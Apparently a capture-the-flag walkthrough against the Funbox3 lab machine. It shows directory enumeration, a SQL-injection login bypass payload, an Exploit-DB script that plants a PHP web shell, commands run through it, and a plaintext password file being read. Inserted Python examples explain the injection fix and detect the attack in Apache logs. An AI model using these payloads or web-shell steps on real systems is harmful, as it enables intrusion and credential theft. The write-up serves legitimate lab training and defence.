2 :80
http://192.168.129.111/
Apache 2 Splash Page
$ gobuster dir -u http://192.168.129.111 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 90
===============================================================
2021/08/12 10:53:33 Starting gobuster in directory enumeration mode
===============================================================
/profile.php (Status: 302) [Size: 7247] [--> http://192.168.129.111/index.php]
/index.php (Status: 200) [Size: 3468]
/index.html (Status: 200) [Size: 10918]
/header.php (Status: 200) [Size: 1666]
/admin (Status: 301) [Size: 318] [--> http://192.168.129.111/admin/]
/store (Status: 301) [Size: 318] [--> http://192.168.129.111/store/]
/registration.php (Status: 200) [Size: 9409]
/logout.php (Status: 200) [Size: 75]
/robots.txt (Status: 200) [Size: 14]
/dashboard.php (Status: 302) [Size: 10272] [--> http://192.168.129.111/index.php]
/secret (Status: 301) [Size: 319] [--> http://192.168.129.111/secret/]
/leftbar.php (Status: 200) [Size: 1837]
/forgot-password.php (Status: 200) [Size: 2763]
/gym (Status: 301) [Size: 316] [--> http://192.168.129.111/gym/]
/hitcounter.txt (Status: 200) [Size: 1]
http://192.168.129.111/index.php
CRM Login Page
http://192.168.129.111/admin/
Admin Login to CRM Admin
http://192.168.129.111/store/
Online CSE Bookstore
http://192.168.129.111/store/admin.php
Admin Login 2017
CSE Bookstore has known exploits on Exploit-DB:
https://www.exploit-db.com/exploits/48960 - Auth Bypass
https://www.exploit-db.com/exploits/47887 - Unauth RCE
# Auth Bypass works
# login to http://192.168.129.111/store/admin.php
using admin:%' or '1'='1
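The bypass works because the login builds its SQL by string concatenation, so the quote in the password closes the literal and the trailing `or '1'='1` makes the WHERE clause always true. The following added example (not code from this page or from CSE Bookstore; the table, column names and placeholder password are constructed for the demo) shows the vulnerable pattern next to the bound-parameter fix, run against an in-memory SQLite table with the payload noted above:

```python
import sqlite3


def make_demo_db():
    """Constructed demo table; not the bookstore's real schema or credentials."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (name TEXT NOT NULL, pass TEXT NOT NULL)")
    conn.execute("INSERT INTO admin VALUES ('admin', 'demo-password-placeholder')")
    return conn


def login_vulnerable(conn, name, password):
    """String-built query: the pattern the auth bypass on this page abuses."""
    sql = f"SELECT name FROM admin WHERE name = '{name}' AND pass = '{password}'"
    return conn.execute(sql).fetchone() is not None


def login_fixed(conn, name, password):
    """Same check with bound parameters: user input is data, never SQL text."""
    sql = "SELECT name FROM admin WHERE name = ? AND pass = ?"
    return conn.execute(sql, (name, password)).fetchone() is not None


BYPASS = "%' or '1'='1"  # the payload noted on this page

if __name__ == "__main__":
    db = make_demo_db()
    # Vulnerable: the clause becomes (name='admin' AND pass='%') OR ('1'='1').
    print("vulnerable, bypass payload:", login_vulnerable(db, "admin", BYPASS))  # True
    # Fixed: the whole payload is compared literally against the stored password.
    print("fixed, bypass payload:     ", login_fixed(db, "admin", BYPASS))  # False
    print("fixed, real password:      ", login_fixed(db, "admin", "demo-password-placeholder"))  # True
```

The vulnerable version does not even need a valid username, since the OR short-circuits the whole condition; the bound version only ever matches a row whose stored value equals the submitted string, and keeps working unchanged once the stored value is a password hash compared in code instead of in SQL.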
# had to modify the RCE script to allow opening a shell
# pass the URL of the /store/ directory, not the login page
python 47887.py http://192.168.129.111/store/
> Attempting to upload PHP web shell...
> Verifying shell upload...
> Web shell uploaded to http://192.168.129.111/store/bootstrap/img/9JtRhAG8E9.php
> Example command usage: http://192.168.129.111/store/bootstrap/img/ooNLYWSSBz.php?cmd=whoami
RCE $
# the interactive shell breaks due to a string error, but the file is uploaded
http://192.168.129.111/store/bootstrap/img/9JtRhAG8E9.php?cmd=whoami;id;hostname
www-data uid=33(www-data) gid=33(www-data) groups=33(www-data) funbox3 funbox3
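From the defender's side, every step above leaves a trace in the Apache access log: a burst of 404s from one client during the gobuster run, a PHP file being served from an image directory (`/store/bootstrap/img/`), and a `cmd=` query string carrying shell metacharacters. The following added example (my code, not part of this writeup or the bookstore project) parses combined-format log lines and flags those three indicators; the log lines, the list of static directories and the 404 threshold are constructed assumptions, and the scanner user-agent check only catches tools that keep their default UA:

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Apache "combined" log format (assumption: the host logs in this format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Directories that should only serve static files; assumed from the app layout on the page.
STATIC_DIRS = ("/bootstrap/img/", "/bootstrap/css/", "/bootstrap/js/", "/images/", "/uploads/")
SCRIPT_EXTS = (".php", ".phtml", ".phar", ".php5")
# Parameter names that simple web shells usually read a command from.
SHELL_PARAMS = {"cmd", "exec", "command"}
# Shell metacharacters or recon commands inside such a parameter.
SHELL_VALUE_RE = re.compile(r"[;|&`$]|\b(id|whoami|hostname|uname|nc|bash|sh)\b")
SCANNER_UA_RE = re.compile(r"gobuster|dirbuster|nikto|sqlmap", re.I)
SCAN_404_THRESHOLD = 50  # 404s from one client before it counts as a scan; tune per site


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def query_params(query):
    """Split a query string on '&' only, so a ';' inside a value is preserved."""
    params = {}
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            params.setdefault(unquote_plus(name).lower(), []).append(unquote_plus(value))
    return params


def check_request(rec):
    """Return the indicator strings that apply to one parsed request."""
    findings = []
    parts = urlsplit(rec["target"])
    path = parts.path.lower()
    if rec["status"] != "404" and path.endswith(SCRIPT_EXTS) and any(d in path for d in STATIC_DIRS):
        findings.append("script executed from a static asset directory")
    for name, values in query_params(parts.query).items():
        if name in SHELL_PARAMS and any(SHELL_VALUE_RE.search(v) for v in values):
            findings.append(f"command-like value in parameter '{name}'")
    if SCANNER_UA_RE.search(rec["ua"]):
        findings.append("known scanner user agent")
    return findings


def analyze_log(lines):
    """Run the checks over an iterable of log lines.

    Returns {"alerts": [{"ip", "target", "findings"}], "scanners": {ip: 404 count}}.
    """
    alerts, not_found = [], Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["status"] == "404":
            not_found[rec["ip"]] += 1
        findings = check_request(rec)
        if findings:
            alerts.append({"ip": rec["ip"], "target": rec["target"], "findings": findings})
    scanners = {ip: n for ip, n in not_found.items() if n >= SCAN_404_THRESHOLD}
    return {"alerts": alerts, "scanners": scanners}


# Constructed sample log (not real captured traffic): a brute-force burst, two normal
# requests, and a web-shell call shaped like the one on this page.
SAMPLE_LOG = [
    f'192.168.129.1 - - [12/Aug/2021:10:53:{i % 60:02d} +0000] "GET /w{i}.php HTTP/1.1" 404 275 "-" "gobuster/3.1.0"'
    for i in range(60)
] + [
    '192.168.129.1 - - [12/Aug/2021:10:55:02 +0000] "GET /store/bootstrap/img/logo.png HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '192.168.129.1 - - [12/Aug/2021:10:55:03 +0000] "GET /store/admin.php HTTP/1.1" 200 2200 "-" "Mozilla/5.0"',
    '192.168.129.1 - - [12/Aug/2021:10:56:10 +0000] "GET /store/bootstrap/img/9JtRhAG8E9.php?cmd=whoami;id;hostname HTTP/1.1" 200 91 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    report = analyze_log(SAMPLE_LOG)
    for ip, n in report["scanners"].items():
        print(f"{ip}: {n} x 404, likely directory brute force")
    for alert in report["alerts"]:
        if alert["findings"] != ["known scanner user agent"]:  # skip UA-only hits in the summary
            print(alert["ip"], alert["target"], "->", "; ".join(alert["findings"]))
```

The first indicator is the most durable one: a web server that executes PHP from an image or upload directory at all is the misconfiguration that turns a file upload into code execution, so the same list of static directories should also back a `php_admin_flag engine off` style rule (or equivalent) in the vhost, not just a log check.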
# can't seem to get a proper reverse shell; time to enumerate
RCE $ ls -la /home
total 12
drwxr-xr-x 3 root root 4096 Jul 30 2020 .
drwxr-xr-x 20 root root 4096 Oct 30 2020 ..
drwxr-xr-x 3 tony tony 4096 Aug 12 19:11 tony
RCE $ ls -la /home/tony
total 28
drwxr-xr-x 3 tony tony 4096 Aug 12 19:11 .
drwxr-xr-x 3 root root 4096 Jul 30 2020 ..
-rw------- 1 tony tony 0 Oct 30 2020 .bash_history
-rw-r--r-- 1 tony tony 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 tony tony 3771 Feb 25 2020 .bashrc
drwx------ 2 tony tony 4096 Aug 12 19:11 .cache
-rw-r--r-- 1 tony tony 807 Feb 25 2020 .profile
-rw-rw-r-- 1 tony tony 70 Jul 31 2020 password.txt
RCE $ cat /home/tony/password.txt
ssh: yxcvbnmYYY
gym/admin: asdfghjklXXX
/store: admin@admin.com admin